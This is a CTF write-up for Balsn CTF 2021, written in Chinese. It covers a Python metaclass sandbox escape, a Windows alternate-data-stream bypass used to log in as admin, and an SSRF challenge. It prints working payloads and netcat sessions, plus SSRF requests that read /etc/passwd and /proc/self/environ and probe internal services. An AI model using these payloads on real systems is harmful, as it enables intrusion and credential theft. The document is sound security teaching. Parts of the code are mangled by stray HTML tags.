balsn-2021-writeup
戰績
Metaeasy
題目
server code
class MasterMetaClass(type):
def __new__(cls, class_name, class_parents, class_attr):
def getFlag(self):
print('Here you go, my master')
with open('flag') as f:
print(f.read())
class_attr[getFlag.__name__] = getFlag
attrs = ((name, value) for name, value in class_attr.items() if not name.startswith('__'))
class_attr = dict(('IWant'+name.upper()+'Plz', value) for name, value in attrs)
newclass = super().__new__(cls, class_name, class_parents, class_attr)
return newclass
def __init__(*argv):
print('Bad guy! No Flag !!')
raise 'Illegal'
class BalsnMetaClass(type):
def getFlag(self):
print('You're not Master! No Flag !!')
<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">__new__</span>(cls, class_name, class_parents, class_attr):
newclass <span style="color:#f92672">=</span> super()<span style="color:#f92672">.</span>__new__(cls, class_name, class_parents, class_attr)
setattr(newclass, cls<span style="color:#f92672">.</span>getFlag<span style="color:#f92672">.</span>__name__, cls<span style="color:#f92672">.</span>getFlag)
<span style="color:#66d9ef">return</span> newclass
def secure_vars(s):
attrs = {name:value for name, value in vars(s).items() if not name.startswith('__')}
return attrs
safe_dict = {
'BalsnMetaClass' : BalsnMetaClass,
'MasterMetaClass' : MasterMetaClass,
'False' : False,
'True' : True,
'abs' : abs,
'all' : all,
'any' : any,
'ascii' : ascii,
'bin' : bin,
'bool' : bool,
'bytearray' : bytearray,
'bytes' : bytes,
'chr' : chr,
'complex' : complex,
'dict' : dict,
'dir' : dir,
'divmod' : divmod,
'enumerate' : enumerate,
'filter' : filter,
'float' : float,
'format' : format,
'hash' : hash,
'help' : help,
'hex' : hex,
'id' : id,
'int' : int,
'iter' : iter,
'len' : len,
'list' : list,
'map' : map,
'max' : max,
'min' : min,
'next' : next,
'oct' : oct,
'ord' : ord,
'pow' : pow,
'print' : print,
'range' : range,
'reversed' : reversed,
'round' : round,
'set' : set,
'slice' : slice,
'sorted' : sorted,
'str' : str,
'sum' : sum,
'tuple' : tuple,
'type' : type,
'vars' : secure_vars,
'zip' : zip,
'builtins':None
}
def createMethod(code):
if len(code) > 45:
print('Too long!! Bad Guy!!')
return
for x in ' _$#@~':
code = code.replace(x,'')
def wrapper(self):
exec(code, safe_dict, {'self' : self})
return wrapper
def setName(pattern):
while True:
name = input(f'Give me your {pattern} name :')
if (name.isalpha()):
break
else:
print('Illegal Name…')
return name
def setAttribute(cls):
attrName = setName('attribute')
while True:
attrValue = input(f'Give me your value:')
if (attrValue.isalnum()):
break
else:
print('Illegal value…')
setattr(cls, attrName, attrValue)
def setMethod(cls):
methodName = setName('method')
code = input(f'Give me your function:')
func = createMethod(code)
setattr(cls, methodName, func)
def getAttribute(obj):
attrs = [attr for attr in dir(obj) if not callable(getattr(obj, attr)) and not attr.startswith("__")]
x = input('Please enter the attribute's name :')
if x not in attrs:
print(f'You can't access the attribute {x}')
return
else:
try:
print(f'{x}: {getattr(obj, x)}')
except:
print("Something went wrong in your attribute…")
return
def callMethod(cls, obj):
attrs = [attr for attr in dir(obj) if callable(getattr(obj, attr)) and not attr.startswith("__")]
x = input('Please enter the method's name :')
if x not in attrs:
print(f'You can't access the method {x}')
return
else:
try:
print(f'calling method {x}…')
cls.dictx
print('done')
except:
print('Something went wrong in your method…')
return
class Guest(metaclass = BalsnMetaClass):
pass
if name == 'main':
print(f'Welcome!!We have prepared a class named "Guest" for you')
cnt = 0
while cnt < 3:
cnt += 1
print('1. Add attribute')
print('2. Add method')
print('3. Finish')
x = input("Option ? :")
if x == "1":
setAttribute(Guest)
elif x == "2":
setMethod(Guest)
elif x == "3":
break
else:
print("invalid input.")
cnt -= 1
print("Well Done! We Create an instance for you !")
obj = Guest()
cnt = 0
while cnt < 3:
cnt += 1
print('1. Inspect attribute')
print('2. Using method')
print('3. Exit')
x = input("Option ? :")
if x == "1":
getAttribute(obj)
elif x == "2":
callMethod(Guest, obj)
elif x == "3":
print("Okay…exit…")
break
else:
print("invalid input.")
cnt -= 1
目標
使用MasterMetaClass這個MetaClass建立一個class並調用裡面的IWantGETFLAGPlz func
限制
- payload 不可超過三行
- payload 一行要低於45字
- payload 不可含[' ‘, ‘_’, ‘$’, ‘#’, ‘@’, ‘~']字元
payload
a=b'\x5f\x5f'.decode();self.i=a+'init'+a
self.d=['',(MasterMetaClass,),{self.i:print}]
type(*self.d)('',(),{})().IWantGETFLAGPlz()
root@jimmyGW:~# nc metaeasy.balsnctf.com 19092
Welcome!!We have prepared a class named "Guest" for you
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :aaa
Give me your function:a=b'\x5f\x5f'.decode();self.i=a+'init'+a
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :bbb
Give me your function:self.d=['',(MasterMetaClass,),{self.i:print}]
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :ccc
Give me your function:type(*self.d)('',(),{})().IWantGETFLAGPlz()
Well Done! We Create an instance for you !
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :aaa
calling method aaa...
done
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :bbb
calling method bbb...
done
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :ccc
calling method ccc...
() {'getFlag': <function MasterMetaClass.__new__.<locals>.getFlag at 0x7f06a60c2550>}
Here you go, my master
BALSN{Metaclasses_Are_Deeper_Magic_Than_99%_Of_Users_Should_Ever_Worry_About._If_You_Wonder_Whether_You_Need_Them,_You_Don't.-Tim_Peters_DE8560A2}
done
flag
BALSN{Metaclasses_Are_Deeper_Magic_Than_99%_Of_Users_Should_Ever_Worry_About._If_You_Wonder_Whether_You_Need_Them,_You_Don’t.-Tim_Peters_DE8560A2}
參考
DarkKnight
題目
server code
import os
import shutil
base_dir = f"C:\Users\balsnctf\Documents\Dark Knight\tmp-{os.urandom(16).hex()}"
def init():
os.mkdir(base_dir)
os.chdir(base_dir)
<span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">"39671"</span>, <span style="color:#e6db74">"w"</span>) <span style="color:#66d9ef">as</span> f:
f<span style="color:#f92672">.</span>write(<span style="color:#e6db74">"alice</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">alice1025"</span>)
<span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">"683077"</span>, <span style="color:#e6db74">"w"</span>) <span style="color:#66d9ef">as</span> f:
f<span style="color:#f92672">.</span>write(<span style="color:#e6db74">"bob</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">bob0105a"</span>)
def password_manager():
print("use a short pin code to achieve fast login!!")
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
pin <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"enter a pin code > "</span>)
<span style="color:#66d9ef">if</span> len(pin) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">if</span> <span style="color:#e6db74">"</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">"</span> <span style="color:#f92672">in</span> pin <span style="color:#f92672">or</span> <span style="color:#e6db74">"/"</span> <span style="color:#f92672">in</span> pin <span style="color:#f92672">or</span> <span style="color:#e6db74">".."</span> <span style="color:#f92672">in</span> pin <span style="color:#f92672">or</span> <span style="color:#e6db74">"*"</span> <span style="color:#f92672">in</span> pin:
print(<span style="color:#e6db74">"what do you want to do?(¬_¬)"</span>)
<span style="color:#66d9ef">continue</span>
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">True</span>
<span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> pin<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">"utf8"</span>):
<span style="color:#66d9ef">if</span> c <span style="color:#f92672">></span> <span style="color:#ae81ff">0x7e</span> <span style="color:#f92672">or</span> c <span style="color:#f92672"><</span> <span style="color:#ae81ff">0x20</span>:
print(<span style="color:#e6db74">"printable chars only!!"</span>)
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">if</span> flag:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
username <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"enter username > "</span>)
<span style="color:#66d9ef">if</span> len(username) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> username<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">"utf8"</span>):
<span style="color:#66d9ef">if</span> c <span style="color:#f92672">></span> <span style="color:#ae81ff">0x7e</span> <span style="color:#f92672">or</span> c <span style="color:#f92672"><</span> <span style="color:#ae81ff">0x20</span>:
print(<span style="color:#e6db74">"printable chars only!!"</span>)
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">if</span> flag:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
password <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"enter password > "</span>)
<span style="color:#66d9ef">if</span> len(password) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> password<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">"utf8"</span>):
<span style="color:#66d9ef">if</span> c <span style="color:#f92672">></span> <span style="color:#ae81ff">0x7e</span> <span style="color:#f92672">or</span> c <span style="color:#f92672"><</span> <span style="color:#ae81ff">0x20</span>:
print(<span style="color:#e6db74">"printable chars only!!"</span>)
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">if</span> flag:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">try</span>:
<span style="color:#66d9ef">with</span> open(pin, <span style="color:#e6db74">"w"</span>) <span style="color:#66d9ef">as</span> f:
f<span style="color:#f92672">.</span>write(username <span style="color:#f92672">+</span> <span style="color:#e6db74">"</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">"</span> <span style="color:#f92672">+</span> password)
print(<span style="color:#e6db74">"saved!!"</span>)
<span style="color:#66d9ef">except</span> <span style="color:#a6e22e">OSError</span>:
print(<span style="color:#e6db74">"pin is invalid!!"</span>)
def safety_guard():
print("safety guard activated. will delete all unsafe credentials hahaha…")
delete_file = []
for pin in os.listdir("."):
safe = True
with open(pin, "r") as f:
data = f.read().split("\n")
if len(data) != 2:
safe = False
elif len(data[0]) == 0 or len(data[1]) == 0:
safe = False
elif data[0].isalnum() == False or data[1].isalnum() == False:
safe = False
elif data[0] == "admin":
safe = False
<span style="color:#66d9ef">if</span> safe <span style="color:#f92672">==</span> <span style="color:#66d9ef">False</span>:
os<span style="color:#f92672">.</span>remove(pin)
delete_file<span style="color:#f92672">.</span>append(pin)
print(f<span style="color:#e6db74">"finished. delete {len(delete_file)} unsafe credentials: </span><span style="color:#e6db74">{delete_file}</span><span style="color:#e6db74">"</span>)
def fast_login():
while True:
pin = input("enter a pin code > ")
<span style="color:#66d9ef">if</span> len(pin) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">if</span> <span style="color:#e6db74">"</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">"</span> <span style="color:#f92672">in</span> pin <span style="color:#f92672">or</span> <span style="color:#e6db74">"/"</span> <span style="color:#f92672">in</span> pin <span style="color:#f92672">or</span> <span style="color:#e6db74">".."</span> <span style="color:#f92672">in</span> pin:
print(<span style="color:#e6db74">"what do you want to do?(¬_¬)"</span>)
<span style="color:#66d9ef">continue</span>
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">True</span>
<span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> pin<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">"utf8"</span>):
<span style="color:#66d9ef">if</span> c <span style="color:#f92672">></span> <span style="color:#ae81ff">0x7e</span> <span style="color:#f92672">or</span> c <span style="color:#f92672"><</span> <span style="color:#ae81ff">0x20</span>:
print(<span style="color:#e6db74">"printable chars only!!"</span>)
flag <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">if</span> flag:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">try</span>:
<span style="color:#66d9ef">with</span> open(pin, <span style="color:#e6db74">"r"</span>) <span style="color:#66d9ef">as</span> f:
data <span style="color:#f92672">=</span> f<span style="color:#f92672">.</span>read()<span style="color:#f92672">.</span>split(<span style="color:#e6db74">"</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">"</span>)
<span style="color:#66d9ef">if</span> len(data) <span style="color:#f92672">!=</span> <span style="color:#ae81ff">2</span>:
print(<span style="color:#e6db74">"unknown error happened??"</span>)
<span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>, <span style="color:#66d9ef">None</span>
<span style="color:#66d9ef">return</span> data[<span style="color:#ae81ff">0</span>], data[<span style="color:#ae81ff">1</span>]
<span style="color:#66d9ef">except</span> <span style="color:#a6e22e">FileNotFoundError</span>:
print(<span style="color:#e6db74">"this pin code is not registered."</span>)
<span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>, <span style="color:#66d9ef">None</span>
def normal_login():
while True:
username = input("enter username > ")
<span style="color:#66d9ef">if</span> len(username) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">elif</span> username<span style="color:#f92672">.</span>isalnum() <span style="color:#f92672">==</span> <span style="color:#66d9ef">False</span>:
print(<span style="color:#e6db74">"strange username, huh?"</span>)
<span style="color:#66d9ef">elif</span> username <span style="color:#f92672">==</span> <span style="color:#e6db74">"admin"</span>:
print(<span style="color:#e6db74">"no you are definitely not (╬ Ò ‸ Ó)"</span>)
<span style="color:#66d9ef">else</span>:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
password <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"enter password > "</span>)
<span style="color:#66d9ef">if</span> len(password) <span style="color:#f92672">></span> <span style="color:#ae81ff">100</span>:
print(<span style="color:#e6db74">"too long..."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">elif</span> password<span style="color:#f92672">.</span>isalnum() <span style="color:#f92672">==</span> <span style="color:#66d9ef">False</span>:
print(<span style="color:#e6db74">"strange password, huh?"</span>)
<span style="color:#66d9ef">else</span>:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">return</span> username, password
def login():
safety_guard()
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
print(<span style="color:#e6db74">"1. fast login"</span>)
print(<span style="color:#e6db74">"2. normal login"</span>)
print(<span style="color:#e6db74">"3. exit"</span>)
x <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"enter login type > "</span>)
<span style="color:#66d9ef">if</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"1"</span>:
username, password <span style="color:#f92672">=</span> fast_login()
<span style="color:#66d9ef">elif</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"2"</span>:
username, password <span style="color:#f92672">=</span> normal_login()
<span style="color:#66d9ef">elif</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"3"</span>:
print(<span style="color:#e6db74">"bye-bye~"</span>)
<span style="color:#66d9ef">return</span>
<span style="color:#66d9ef">else</span>:
print(<span style="color:#e6db74">"invalid input."</span>)
<span style="color:#66d9ef">continue</span>
<span style="color:#66d9ef">if</span> username <span style="color:#f92672">!=</span> <span style="color:#66d9ef">None</span> <span style="color:#f92672">and</span> password <span style="color:#f92672">!=</span> <span style="color:#66d9ef">None</span>:
print(f<span style="color:#e6db74">"hello, </span><span style="color:#e6db74">{username}</span><span style="color:#e6db74">."</span>)
<span style="color:#66d9ef">if</span> username <span style="color:#f92672">==</span> <span style="color:#e6db74">"admin"</span>:
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
x <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"do you want the flag? (y/n): "</span>)
<span style="color:#66d9ef">if</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"n"</span>:
print(<span style="color:#e6db74">"OK, bye~"</span>)
<span style="color:#66d9ef">return</span>
<span style="color:#66d9ef">elif</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"y"</span>:
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">else</span>:
print(<span style="color:#e6db74">"invalid input."</span>)
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
x <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"beg me: "</span>)
<span style="color:#66d9ef">if</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"plz"</span>:
print(<span style="color:#e6db74">"ok, here is your flag: BALSN{flag is here ...}"</span>)
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">return</span>
def main():
init()
<span style="color:#66d9ef">try</span>:
<span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
print(<span style="color:#e6db74">"1. passord manager"</span>)
print(<span style="color:#e6db74">"2. login"</span>)
print(<span style="color:#e6db74">"3. exit"</span>)
x <span style="color:#f92672">=</span> input(<span style="color:#e6db74">"what do you want to do? > "</span>)
<span style="color:#66d9ef">if</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"1"</span>:
password_manager()
<span style="color:#66d9ef">elif</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"2"</span>:
login()
<span style="color:#66d9ef">elif</span> x <span style="color:#f92672">==</span> <span style="color:#e6db74">"3"</span>:
print(<span style="color:#e6db74">"bye-bye~"</span>)
<span style="color:#66d9ef">break</span>
<span style="color:#66d9ef">else</span>:
print(f<span style="color:#e6db74">"invalid input: </span><span style="color:#e6db74">{x}</span><span style="color:#e6db74">"</span>)
<span style="color:#66d9ef">except</span> <span style="color:#a6e22e">KeyboardInterrupt</span>:
print(<span style="color:#e6db74">"bye-bye~"</span>)
<span style="color:#66d9ef">except</span>:
print(<span style="color:#e6db74">"unexpected error occured."</span>)
os<span style="color:#f92672">.</span>chdir(<span style="color:#e6db74">"../"</span>)
shutil<span style="color:#f92672">.</span>rmtree(base_dir)
if name == "main":
main()
目標
使用login選項成功登入admin
限制
- 用 normal_login 會直接被檔
- login 前,所有在 passord manager 所建立的 fast_login 檔若包含’admin’會被刪
- 做 passord manager 時 pin(filename) 不可包含['\’, ‘/’, ‘..’, ‘*'] 字串
payload
因為 server 是 windows os ,所以可以用alternate_stream_name繞過 如:C:\user\docs\somefile.ext:alternate_stream_name
root@jimmyGW:~# nc darkknight.balsnctf.com 8084
1. passord manager
2. login
3. exit
what do you want to do? > 1
use a short pin code to achieve fast login!!
enter a pin code > 39671:aaa
enter username > admin
enter password > aaaa
saved!!
1. passord manager
2. login
3. exit
what do you want to do? > 2
safety guard activated. will delete all unsafe credentials hahaha...
finished. delete 0 unsafe credentials: []
1. fast login
2. normal login
3. exit
enter login type > 1
enter a pin code > 39671:aaa
hello, admin.
do you want the flag? (y/n): y
beg me: plz
ok, here is your flag: BALSN{however_Admin_passed_the_Dark_knight_with_hiding_behind_Someone}
1. passord manager
2. login
3. exit
what do you want to do? > 3
bye-bye~
flag
BALSN{however_Admin_passed_the_Dark_knight_with_hiding_behind_Someone}
參考
Introduction to ADS – Alternate Data Streams
DarkKnight
題目
解題
進來看到這個
試著 http://proxy.balsnctf.com/query?site=http://www.google.com
試著 ssrf http://proxy.balsnctf.com/query?site=file:///etc/passwd
試著 http://proxy.balsnctf.com/query?site=file:///proc/self/environ
試著 http://proxy.balsnctf.com/query?site=file:///proc/net/tcp
試著 http://proxy.balsnctf.com/query?site=http://127.0.0.1:15000
試著 http://proxy.balsnctf.com/query?site=http://127.0.0.1:15000/stats
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307/flag
炸
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307//flag
過
flag
BALSN{default_istio_service_mesh_envoy_configurations}